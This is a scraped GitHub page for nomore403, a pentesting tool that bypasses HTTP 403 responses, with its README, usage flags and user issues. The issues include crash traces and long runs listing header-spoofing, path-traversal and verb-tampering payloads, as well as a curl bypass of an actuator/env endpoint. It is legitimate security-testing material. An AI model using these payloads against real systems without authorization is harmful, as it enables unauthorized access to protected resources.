devploit / nomore403 Goto Github PK

View Code? Open in Web Editor NEW

958.0 14.0 118.0 139 KB

Tool to bypass 403/40X response codes.

License: MIT License

Go 100.00%

waf-bypass pentesting websec bugbounty ctf 403 403-bypass bypass

nomore403's Introduction

NoMore403

Introduction

nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites

Before you install and run nomore403, make sure you have the following:

Go 1.15 or higher installed on your machine.

Installation

From Releases

Grab the latest release for your OS from our Releases page.

Compile from Source

If you prefer to compile the tool yourself:

git clone https://github.com/devploit/nomore403
cd nomore403
go get
go build

Customization

To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage

Output example

    ________  ________  ________  ________  ________  ________  ________  ________  ________
   ╱     ╱  ╲╱        ╲╱    ╱   ╲╱        ╲╱        ╲╱        ╲╱    ╱   ╲╱        ╲╱__      ╲
  ╱         ╱    ╱    ╱         ╱    ╱    ╱    ╱    ╱       __╱         ╱    ╱    ╱__       ╱
 ╱         ╱         ╱         ╱         ╱        _╱       __/____     ╱         ╱         ╱
 ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱    ╱____╱╲________╱╲________╱  

Target: 		https://domain.com/admin
Headers:                false
Proxy:                  false
User Agent:             Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)
Method:                 GET
Payloads folder:        payloads
Custom bypass IP:       false
Follow Redirects:       false
Rate Limit detection:   false
Verbose:                false

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 	  429 bytes https://domain.com/admin

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
200 	 2047 bytes https://domain.com/;///..admin

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403      429 bytes HTTP/1.0
403      429 bytes HTTP/1.1
403      429 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
200 	 2047 bytes https://domain.com/%61dmin

Basic Usage

./nomore403 -u https://domain.com/admin

Verbose Mode + Proxy

./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v

Parse request from Burp

./nomore403 --request-file request.txt

Use custom header + specific IP address for bypasses

./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8

Set new max of goroutines + add delay between requests

./nomore403 -u https://domain.com/admin -m 10 -d 200

Options

./nomore403 -h
Command line application that automates different ways to bypass 40X codes.

Usage:
  nomore403 [flags]

Flags:
  -i, --bypass-ip string      Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.
  -d, --delay int             Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).
  -f, --folder string         Specify the folder location for payloads if not in the same directory as the executable.
  -H, --header strings        Add one or more custom headers to requests. Repeatable flag for multiple headers.
  -h, --help                  help for nomore403
      --http                  Use HTTP instead of HTTPS for requests defined in the request file.
  -t, --http-method string    Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.
  -m, --max-goroutines int    Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)
      --no-banner             Disable the display of the startup banner (default: banner shown).
  -x, --proxy string          Specify a proxy server for requests, e.g., 'http://server:port'.
      --random-agent          Enable the use of a randomly selected User-Agent.
  -l, --rate-limit            Halt requests upon encountering a 429 (rate limit) HTTP status code.
  -r, --redirect              Automatically follow redirects in responses.
      --request-file string   Load request configuration and flags from a specified file.
      --timeout int           Specify a max timeout time in ms (default 6000)
  -u, --uri string            Specify the target URL for the request.
  -a, --user-agent string     pecify a custom User-Agent string for requests (default: 'nomore403').
  -v, --verbose               Enable verbose output for detailed request/response logging.

Contributing

We welcome contributions of all forms. Here's how you can help:

Report bugs and suggest features.
Submit pull requests with bug fixes and new features.

Security Considerations

While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.

License

nomore403 is released under the MIT License. See the LICENSE file for details.

Contact

nomore403's People

Contributors

Stargazers

Watchers

Forkers

mkdirlove test502git titounkle jorgectf 5l1v3r1 419066074 isgasho hkervit bravery9 marcoshat rns-sec tor-0 seqrity sofienelkamel gprime31 jayaram-yalla n25sec crtnoalves gister9000 swajyadip1997 zapstiko ovelny bbhunter spongyb m3g4byt3 tommalvoriddle ckevens jabdy86 eze-kiel dattaiwanguy 0xsojalsec polling-repo-continua affilares kyisoethin94 zzhsec lamscun dace-cyber hartl3y94 ian-bishop six2dez tk-t0n0y mrthe micro0x00 c15c01337 yukik4ze sudip444 ronin-dojo piyushimself gmh5225 averroes samidunimsara slooppe mbrg jrandomsage g6kg kharaone cyberfury101 itsignacioportal w3llr00t3d adelante10k yycunhua maalp1225 tinyx3k munstar0s h3adex g0tha 4rth4s jotnarss0n ghurcka nxg-7 isaachjk wuxueeee afwu iq-scm istoliving canitey excloudx6 emadyay mrvcoder h1d3r sahar042 beebird echoesofdreams dahabjr jaikumar3 frankkyounger ev3rpalestine gavz hdys0vn albertofdr zha0 dannymas hotelzululima tucommenceapousser yutianqaq alm6iri ibrahemmohamed1 samy4samy peacedata0 eblab

nomore403's Issues

Tool Crash

[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x468041]
goroutine 1 [running]:
fmt.(*buffer).writeString(...)
/usr/lib/go-1.19/src/fmt/print.go:82
fmt.(*fmt).padString(0x41b7c6?, {0x0, 0x13})
/usr/lib/go-1.19/src/fmt/format.go:110 +0x247
fmt.(*fmt).fmtS(0xc0002d00d0?, {0x0?, 0xc00010c800?})
/usr/lib/go-1.19/src/fmt/format.go:359 +0x3f
fmt.(*pp).fmtString(0x4f4bc6?, {0x0?, 0xc0004429e9?}, 0x0?)
/usr/lib/go-1.19/src/fmt/print.go:474 +0x86
fmt.(*pp).printArg(0xc0002d00d0, {0x7e7bc0?, 0xc0004729a0}, 0x76)
/usr/lib/go-1.19/src/fmt/print.go:725 +0x21e
fmt.(*pp).doPrintf(0xc0002d00d0, {0xc000442a07, 0x9}, {0xc00010cac8?, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:1057 +0x288
fmt.Fprintf({0x919d00, 0xc000706580}, {0xc000442a07, 0x9}, {0xc00010cac8, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:204 +0x75
github.com/cheynewallace/tabby.(*Tabby).AddLine(0xc000014008, {0xc00010cac8, 0x3, 0x3})
/root/go/pkg/mod/github.com/cheynewallace/[email protected]/tabby.go:31 +0x59
dontgo403/cmd.printResponse({0xc00092e000, 0x550, 0xc0000264ac?})
/home/dontgo403/cmd/requester.go:36 +0x2f6
dontgo403/cmd.requestHeaders({0xc0003ee4e0, 0x2f}, {0xc0005926e0, 0x1, 0x1}, 0xc000169b90, {0x0, 0x0}, {0x7ffcc82d3310, 0xe}, ...)
/home/dontgo403/cmd/requester.go:136 +0x2d3
dontgo403/cmd.requester({0xc000129919, 0x2e}, {0x0?, 0x0?}, {0x7ffcc82d3322, 0x6f}, {0xc000037100, 0x1, 0x0?}, {0x0, ...}, ...)
/home/dontgo403/cmd/requester.go:291 +0x385
dontgo403/cmd.glob..func1(0xb7bd80?, {0x861224?, 0x6?, 0x6?})
/home/dontgo403/cmd/root.go:48 +0x31c
github.com/spf13/cobra.(*Command).execute(0xb7bd80, {0xc000024080, 0x6, 0x6})
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7bd80)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
/home/dontgo403/cmd/root.go:63 +0x25
main.main()
/home/dontgo403/main.go:22 +0x17

is urlencode(random path strings) to dontgo403?

For example, we want to do bypass the actuator/env endpoint

curl http://[MASK].com/actuator/env

Use dontgo403 (default config)

curl http://[MASK].com/actuator/env;%2f..%2f..

Response: 403 Forbidden

When we add urlencode(some senstive files), /actuator/env

curl http://[MASK].com/act%75ato/env;%2f..%2f..

Response:

 {
  "activeProfiles" : [ "dev" ],
  "propertySources" : [ {
  .....

maybe this method can bypass some incorrect nginx configuration

my tools support this feature, but I think your tool is better than mine in terms of coding structure and practicality. If I had found your tool earlier, i wouldn't have reinvented the wheel. LOL

I hope u will consider adding this feature.

Errors

Hi,

The Tool is super cool & super fast really appreciate The Time For Creating This Tool, But am Facing an issues With This Tool, The First issue as, when i run The Tool it works Fine But it comes in CUSTOM PATHS Exploit and it shows Me This Error
`panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x7518b4]

goroutine 2396 [running]:
dontgo403/cmd.requestMidPaths.func1({0xc000fcb2dc, 0x4})
/opt/tools/dontgo403/cmd/requester.go:268 +0x474
created by dontgo403/cmd.requestMidPaths
/opt/tools/dontgo403/cmd/requester.go:250 +`

The Second issue is, sometimes The Tool Works Fine But it gives me This Error
2022/01/18 22:00:34 Patch "https://www.google.com/": dial tcp: i/o timeout

Tag the source

It would be very helpful if you could tag releases as well. This would enable distributions to fetch the source from GitHub instead of working with git checkouts.

Thanks

Flags

@devploit Needed some functionality like -r for redirect (optional) and also an argument to avoid the host if it throws 429 Status code

Is this added to dontgo403?

I recently read article on 403 bypass here:
https://medium.com/@abbasheybati1/403-bypass-lyncdiscover-microsoft-com-db2778458c33

Iwant to know is dontgo403 does this or not? If not how i can add this?

Ability to specify custom payload position(s)

Currently, the payload position defaults to the end of the URL. Being able to specify a custom payload position would be beneficial in certain cases.

For example:
./nomore -u example.com/organization/100/user/200?foo=bar

In this case, one may want to target the "organization ID" (100) and/or the "user ID" (200) instead of inserting payloads at the end.

An added bonus would be if it was possible to specify multiple positions.

panic: runtime error: index out of range [1] with length 1

Fails to parse request from Burp:

./dontgo403 -r /home/kali/tmp/req 
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
dontgo403/cmd.requester({0xc00016a100, 0x7d}, {0x0?, 0x0?}, {0x0, 0x0}, {0xc00017e400?, 0x10, 0x10}, {0x0, ...}, ...)
	/home/kali/hacktools/web/dontgo403/cmd/requester.go:393 +0x747
dontgo403/cmd.loadFlagsFromRequestFile({0x7fffd2c94fb1?, 0x0?}, 0x0, 0x0?)
	/home/kali/hacktools/web/dontgo403/cmd/api.go:139 +0x305
dontgo403/cmd.glob..func1(0xb7cd00?, {0x860f2b?, 0x2?, 0x2?})
	/home/kali/hacktools/web/dontgo403/cmd/root.go:57 +0x291
github.com/spf13/cobra.(*Command).execute(0xb7cd00, {0xc00011c160, 0x2, 0x2})
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7cd00)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
	/home/kali/hacktools/web/dontgo403/cmd/root.go:75 +0x25
main.main()
	/home/kali/hacktools/web/dontgo403/main.go:22 +0x17

Here is the request:

cat ~/tmp/req 
POST /openai/deployments/text-gpt-4-32k/chat/completions?api-version=2023-03-15-preview HTTP/1.1
Host: cdo-eastus-openai.openai.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Connection: close

Is it possible to add HTTP VERB TAMPERING Mehtods using Case Sensitivity Manipulation?
Like:
GeT, gEt, poST, PosT etc?

Use case:

------------------------CTF--------------------
cat /var/www/html/admin/.htaccess 
<If "%{REQUEST_METHOD} == 'HEAD' || %{REQUEST_METHOD} == 'OPTIONS' || %{REQUEST_METHOD} == 'PATCH' ||  %{REQUEST_METHOD} == 'GET' || %{REQUEST_METHOD} == 'POST' || %{REQUEST_METHOD} == 'PUT' || %{REQUEST_METHOD} == 'DELETE' || %{REQUEST_METHOD} == 'TRACE'"> 

deny from all
</If>
#</Directory>
-------------------------------------------------

WooZooO@Priv:~$ curl -X POST http://172.16.67.124/admin/index.php -I
HTTP/1.1 403 Forbidden
Date: Tue, 19 Mar 2024 05:56:01 GMT
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1

WooZooO@Priv:~$ curl -X **PoST** http://172.16.67.124/admin/index.php -I
**HTTP/1.1 200 OK**
Date: Tue, 19 Mar 2024 05:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 96
Content-Type: text/html; charset=UTF-8

AFAIK current version of "nomore403" doesn't use this methods:

./nomore403 --random-agent -i "192.168.12.12" -v -u http://172.16.67.124/admin/ -r --random-agent  -H "Hello: Cookie"

    ________  ________  ________  ________  ________  ________  ________  ________  ________
   ╱     ╱  ╲╱        ╲╱    ╱   ╲╱        ╲╱        ╲╱        ╲╱    ╱   ╲╱        ╲╱__      ╲
  ╱         ╱    ╱    ╱         ╱    ╱    ╱    ╱    ╱       __╱         ╱    ╱    ╱__       ╱
 ╱         ╱         ╱         ╱         ╱        _╱       __/____     ╱         ╱         ╱
 ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱    ╱____╱╲________╱╲________╱                                   
	
Target: 		http://172.16.67.124/admin/
Headers: 		{User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15}
Headers: 		{Hello  Cookie}
Proxy: 			false
User Agent: 		Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15
Method: 		GET
Payloads folder: 	payloads
Custom bypass IP: 	192.168.12.12
Follow Redirects: 	true
Rate Limit detection: 	false
Verbose: 		true

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 	  372 bytes http://172.16.67.124/admin/

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━
200 	  393 bytes TRACE
403 	  372 bytes COPY
400 	  392 bytes CONNECT
403 	  372 bytes VERSION-CONTROL
403 	  372 bytes OPTIONS
403 	  372 bytes PUT
403 	  372 bytes POUET
403 	  372 bytes TRACK
403 	  372 bytes POST
403 	  372 bytes MOVE
403 	  372 bytes PATCH
403 	  143 bytes HEAD
403 	  372 bytes LABEL
403 	  372 bytes GET
403 	  372 bytes UNCHECKOUT
403 	  372 bytes DELETE
403 	  372 bytes LOCK
403 	  372 bytes UPDATE

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━
403 	  372 bytes Request-Uri: 192.168.12.12
403 	  372 bytes Referrer: 192.168.12.12
403 	  372 bytes X-Forwarded-Proto: 192.168.12.12
403 	  372 bytes Referer: 192.168.12.12
403 	  372 bytes X-Forwarded-Host: 192.168.12.12
403 	  372 bytes Redirect: 192.168.12.12
403 	  372 bytes X-Forwarded-For-Original: 192.168.12.12
403 	  372 bytes Proxy-Host: 192.168.12.12
403 	  372 bytes X-Referrer: 192.168.12.12
403 	  372 bytes Proxy: 192.168.12.12
403 	  372 bytes Proxy-Url: 192.168.12.12
403 	  372 bytes Real-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Originating-IP: 192.168.12.12
403 	  372 bytes Http-Url: 192.168.12.12
403 	  372 bytes X-Forwarded-By: 192.168.12.12
403 	  372 bytes X-Proxy-Url: 192.168.12.12
403 	  372 bytes X-ProxyUser-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded: 192.168.12.12
403 	  372 bytes Forwarded-For-Ip: 192.168.12.12
403 	  372 bytes Profile: 192.168.12.12
403 	  372 bytes Origin: 192.168.12.12
403 	  372 bytes X-Real-IP: 192.168.12.12
403 	  372 bytes Host: 192.168.12.12
403 	  372 bytes X-Original-URL: 192.168.12.12
403 	  372 bytes Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forward-For: 192.168.12.12
403 	  372 bytes X-Original-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Forward: 192.168.12.12
403 	  372 bytes X-HTTP-Host-Override: 192.168.12.12
403 	  372 bytes X-Host: 192.168.12.12
403 	  372 bytes X-HTTP-DestinationURL: 192.168.12.12
403 	  372 bytes X-Originally-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forwarded-Server: 192.168.12.12
403 	  372 bytes X-Forwarder-For: 192.168.12.12
403 	  372 bytes Uri: 192.168.12.12
403 	  372 bytes Forwarded: 192.168.12.12
403 	  372 bytes Client-IP: 192.168.12.12
403 	  372 bytes True-Client-IP: 192.168.12.12
403 	  372 bytes Destination: 192.168.12.12
403 	  372 bytes X-Arbitrary: 192.168.12.12
403 	  372 bytes CF-Connecting_IP: 192.168.12.12
403 	  372 bytes X-Custom-IP-Authorization: 192.168.12.12
403 	  372 bytes Access-Control-Allow-Origin: 192.168.12.12
403 	  372 bytes Base-Url: 192.168.12.12
403 	  372 bytes X-Client-IP: 192.168.12.12
403 	  372 bytes Url: 192.168.12.12
403 	  372 bytes CF-Connecting-IP: 192.168.12.12
403 	  372 bytes X-Remote-IP: 192.168.12.12
403 	  372 bytes X-Rewrite-URL: 192.168.12.12
403 	  372 bytes X-WAP-Profile: 192.168.12.12
403 	  372 bytes X-Real-Ip: 192.168.12.12
403 	  372 bytes X-HTTP-Method-Override POST
403 	  372 bytes X-True-IP: 192.168.12.12
403 	  372 bytes Referer /admin
403 	  372 bytes X-Rewrite-URL /admin
403 	  372 bytes X-Forwarded-Port 80
403 	  372 bytes X-Override-URL /admin
403 	  372 bytes X-Forwarded-Port 8443
403 	  372 bytes X-Forwarded-Port 8080
403 	  372 bytes X-Forwarded-Port 4443
403 	  372 bytes X-Forwarded-Port 443
403 	  372 bytes X-Original-URL /admin
403 	  372 bytes X-HTTP-Method-Override PUT

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
403 	  373 bytes http://172.16.67.124/admin/1
403 	  372 bytes http://172.16.67.124/admin//.
403 	  372 bytes http://172.16.67.124/admin/?
403 	  372 bytes http://172.16.67.124/admin/??
403 	  376 bytes http://172.16.67.124/admin/.svc
403 	  377 bytes http://172.16.67.124/admin/.wsdl
403 	  376 bytes http://172.16.67.124/admin/.svc?wsdl
403 	  372 bytes http://172.16.67.124/admin//
403 	  373 bytes http://172.16.67.124/admin/0
403 	  372 bytes http://172.16.67.124/admin///
403 	  375 bytes http://172.16.67.124/admin/..;
403 	  372 bytes http://172.16.67.124/admin/./
403 	  376 bytes http://172.16.67.124/admin/..\;
403 	  372 bytes http://172.16.67.124/admin//
403 	  376 bytes http://172.16.67.124/admin/.css
403 	  377 bytes http://172.16.67.124/admin/.html
403 	  373 bytes http://172.16.67.124/admin/%61
403 	  372 bytes http://172.16.67.124/admin/.
403 	  373 bytes http://172.16.67.124/admin/-
403 	  372 bytes http://172.16.67.124/admin/?debug=true
403 	  372 bytes http://172.16.67.124/admin/?
403 	  377 bytes http://172.16.67.124/admin/&
403 	  372 bytes http://172.16.67.124/admin/??
403 	  372 bytes http://172.16.67.124/admin/?WSDL
403 	  372 bytes http://172.16.67.124/admin/?debug=1
403 	  377 bytes http://172.16.67.124/admin/.json
403 	  372 bytes http://172.16.67.124/admin///
403 	  372 bytes http://172.16.67.124/admin/???
403 	  379 bytes http://172.16.67.124/admin/.random
403 	  376 bytes http://172.16.67.124/admin/\/\/
403 	  377 bytes http://172.16.67.124/admin/debug
403 	  376 bytes http://172.16.67.124/admin/.php
403 	  372 bytes http://172.16.67.124/admin/?testparam
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin/?param
403 	  374 bytes http://172.16.67.124/admin/%20/
403 	  373 bytes http://172.16.67.124/admin/%20
403 	  373 bytes http://172.16.67.124/admin/%0D
403 	  373 bytes http://172.16.67.124/admin/%0A
404 	  368 bytes http://172.16.67.124/admin/%00
403 	  373 bytes http://172.16.67.124/admin/%09
403 	  372 bytes http://172.16.67.124/admin/#test
403 	  372 bytes http://172.16.67.124/admin/#
403 	  375 bytes http://172.16.67.124/admin/°/
403 	  376 bytes http://172.16.67.124/admin/..;/
403 	  372 bytes http://172.16.67.124/admin/#/./
403 	  372 bytes http://172.16.67.124/admin/#/
403 	  376 bytes http://172.16.67.124/admin//..;/
403 	  377 bytes http://172.16.67.124/admin/..\;/
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin//./
403 	  373 bytes http://172.16.67.124/admin//*
403 	  377 bytes http://172.16.67.124/admin/false
403 	  376 bytes http://172.16.67.124/admin//..%3B/
404 	  376 bytes http://172.16.67.124/admin/;%2f..%2f..%2f
403 	  373 bytes http://172.16.67.124/admin/%3f
403 	  377 bytes http://172.16.67.124/admin/%26
403 	  373 bytes http://172.16.67.124/admin/%23
403 	  373 bytes http://172.16.67.124/admin/%25
403 	  376 bytes http://172.16.67.124/admin/null
403 	  376 bytes http://172.16.67.124/admin/true
403 	  372 bytes http://172.16.67.124/%2e/admin/
404 	  372 bytes http://172.16.67.124/%252f/admin/
404 	  369 bytes http://172.16.67.124/%20admin/
404 	  370 bytes http://172.16.67.124/%20/admin/
404 	  369 bytes http://172.16.67.124/%23admin/
404 	  374 bytes http://172.16.67.124/%252f%252fadmin/
404 	  370 bytes http://172.16.67.124/%23%3fadmin/
404 	  367 bytes http://172.16.67.124/%admin/
404 	  369 bytes http://172.16.67.124/%09admin/
404 	  371 bytes http://172.16.67.124/%09..admin/
404 	  370 bytes http://172.16.67.124/%09;admin/
404 	  369 bytes http://172.16.67.124/%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%20%23admin/
404 	  370 bytes http://172.16.67.124/%2f%23admin/
404 	  370 bytes http://172.16.67.124/%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3b%2fadmin/
200 	 3427 bytes http://172.16.67.124/#admin/
404 	  364 bytes http://172.16.67.124/..%00/admin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e.admin/
404 	  377 bytes http://172.16.67.124/%3b%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f..admin/
404 	  373 bytes http://172.16.67.124/%26admin/
404 	  369 bytes http://172.16.67.124/%2eadmin/
200 	 3427 bytes http://172.16.67.124/#?admin/
404 	  370 bytes http://172.16.67.124/%09%3badmin/
404 	  370 bytes http://172.16.67.124/%2e%2eadmin/
404 	  371 bytes http://172.16.67.124/%2e%2e%2fadmin/
400 	  392 bytes http://172.16.67.124/%2e%2e/admin/
404 	  373 bytes http://172.16.67.124/&admin/
404 	  370 bytes http://172.16.67.124/..admin/
400 	  392 bytes http://172.16.67.124/.%2e/admin/
404 	  370 bytes http://172.16.67.124/%3f%23admin/
404 	  370 bytes http://172.16.67.124/%3f%3fadmin/
404 	  377 bytes http://172.16.67.124/%3b/%2e%2e/..%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b/%2e.admin/
404 	  372 bytes http://172.16.67.124/..%0d/admin/
404 	  369 bytes http://172.16.67.124/%3fadmin/
404 	  372 bytes http://172.16.67.124/%3b/..admin/
404 	  375 bytes http://172.16.67.124/%3b//%2f../admin/
404 	  370 bytes http://172.16.67.124/%3b%09admin/
404 	  369 bytes http://172.16.67.124/%3badmin/
404 	  370 bytes http://172.16.67.124/%2f/admin/
404 	  371 bytes http://172.16.67.124/..%09admin/
404 	  370 bytes http://172.16.67.124/%2f%3fadmin/
404 	  375 bytes http://172.16.67.124/%3b/%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/%2f%3b%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3f/admin/
404 	  364 bytes http://172.16.67.124/..%00;/admin/
404 	  371 bytes http://172.16.67.124/..%3Badmin/
404 	  371 bytes http://172.16.67.124/..%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e%2eadmin/
400 	  392 bytes http://172.16.67.124/../admin/
404 	  373 bytes http://172.16.67.124/..%0d;/admin/
403 	  372 bytes http://172.16.67.124/.//./admin/
404 	  364 bytes http://172.16.67.124/..%00/;admin/
400 	  392 bytes http://172.16.67.124/.././admin/
404 	  371 bytes http://172.16.67.124/.;/admin/
404 	  373 bytes http://172.16.67.124/..%ff/;admin/
404 	  372 bytes http://172.16.67.124/..%5c/admin/
404 	  371 bytes http://172.16.67.124/..%5cadmin/
404 	  373 bytes http://172.16.67.124/..;%ff/admin/
404 	  373 bytes http://172.16.67.124/..;%0d/admin/
404 	  365 bytes http://172.16.67.124/..;%00/admin/
404 	  371 bytes http://172.16.67.124/..%ffadmin/
404 	  372 bytes http://172.16.67.124/.\;/admin/
404 	  371 bytes http://172.16.67.124//%252fadmin/
404 	  370 bytes http://172.16.67.124//%2e%2eadmin/
404 	  372 bytes http://172.16.67.124//%252e/admin/
404 	  375 bytes http://172.16.67.124//%252e%253b/admin/
404 	  375 bytes http://172.16.67.124//%252e%252f/admin/
404 	  373 bytes http://172.16.67.124/..%0d/;admin/
404 	  373 bytes http://172.16.67.124/..;\;admin/
404 	  372 bytes http://172.16.67.124/..\;admin/
404 	  373 bytes http://172.16.67.124/..;\\admin/
404 	  372 bytes http://172.16.67.124/..\\admin/
403 	  372 bytes http://172.16.67.124/./admin/
404 	  369 bytes http://172.16.67.124/./.admin/
404 	  372 bytes http://172.16.67.124/..;/admin/
403 	  372 bytes http://172.16.67.124//admin/
404 	  371 bytes http://172.16.67.124/..;admin/
404 	  373 bytes http://172.16.67.124/.jsonadmin/
404 	  371 bytes http://172.16.67.124//%20%20/admin/
403 	  377 bytes http://172.16.67.124/.htmladmin/
404 	  363 bytes http://172.16.67.124//%20#admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%253b/admin/
400 	  392 bytes http://172.16.67.124//%2e%2e/admin/
404 	  372 bytes http://172.16.67.124//%2e%2e%3b/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b/admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%252f/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b//admin/
404 	  371 bytes http://172.16.67.124//%2e%2f/admin/
404 	  373 bytes http://172.16.67.124/..%ff;/admin/
404 	  369 bytes http://172.16.67.124//%2fadmin/
404 	  370 bytes http://172.16.67.124//%3b/admin/
403 	  372 bytes http://172.16.67.124//%2e//admin/
404 	  371 bytes http://172.16.67.124//..%2fadmin/
404 	  369 bytes http://172.16.67.124//*admin/
404 	  370 bytes http://172.16.67.124//*/admin/
403 	  372 bytes http://172.16.67.124//%2e/admin/
404 	  370 bytes http://172.16.67.124//%20%23admin/
404 	  369 bytes http://172.16.67.124//.admin/
400 	  392 bytes http://172.16.67.124//../admin/
404 	  370 bytes http://172.16.67.124//..admin/
403 	  372 bytes http://172.16.67.124//../../..//admin/
400 	  392 bytes http://172.16.67.124//../..//../admin/
400 	  392 bytes http://172.16.67.124//../..;/admin/
404 	  374 bytes http://172.16.67.124//..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../;/../admin/
400 	  392 bytes http://172.16.67.124//..//../admin/
400 	  392 bytes http://172.16.67.124//../.;/../admin/
403 	  372 bytes http://172.16.67.124//../..//admin/
400 	  392 bytes http://172.16.67.124//..//../../admin/
404 	  372 bytes http://172.16.67.124//..//..;/admin/
400 	  392 bytes http://172.16.67.124//.././../admin/
400 	  392 bytes http://172.16.67.124//../;/admin/
400 	  392 bytes http://172.16.67.124//../../admin/
404 	  377 bytes http://172.16.67.124//..%2f..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../../../admin/
403 	  372 bytes http://172.16.67.124//..//admin/
404 	  372 bytes http://172.16.67.124//..;%2fadmin/
400 	  392 bytes http://172.16.67.124///../../admin/
403 	  372 bytes http://172.16.67.124//..;/../admin/
403 	  372 bytes http://172.16.67.124///admin/
404 	  369 bytes http://172.16.67.124///.admin/
404 	  370 bytes http://172.16.67.124///..admin/
403 	  372 bytes http://172.16.67.124///./admin/
404 	  380 bytes http://172.16.67.124//..;%2f..;%2f..;%2fadmin/
404 	  370 bytes http://172.16.67.124////..admin/
404 	  371 bytes http://172.16.67.124//.;//admin/
404 	  372 bytes http://172.16.67.124//..;/admin/
400 	  392 bytes http://172.16.67.124////../admin/
404 	  372 bytes http://172.16.67.124//..;//../admin/
404 	  372 bytes http://172.16.67.124////..;//admin/
404 	  371 bytes http://172.16.67.124////..;admin/
404 	  376 bytes http://172.16.67.124//..;/..;/admin/
200 	 3427 bytes http://172.16.67.124///?anythingadmin/
403 	  372 bytes http://172.16.67.124////..//admin/
404 	  370 bytes http://172.16.67.124//;//admin/
404 	  370 bytes http://172.16.67.124//;xadmin/
404 	  371 bytes http://172.16.67.124///.;/admin/
404 	  370 bytes http://172.16.67.124//x//../admin/
404 	  374 bytes http://172.16.67.124//x/..;//admin/
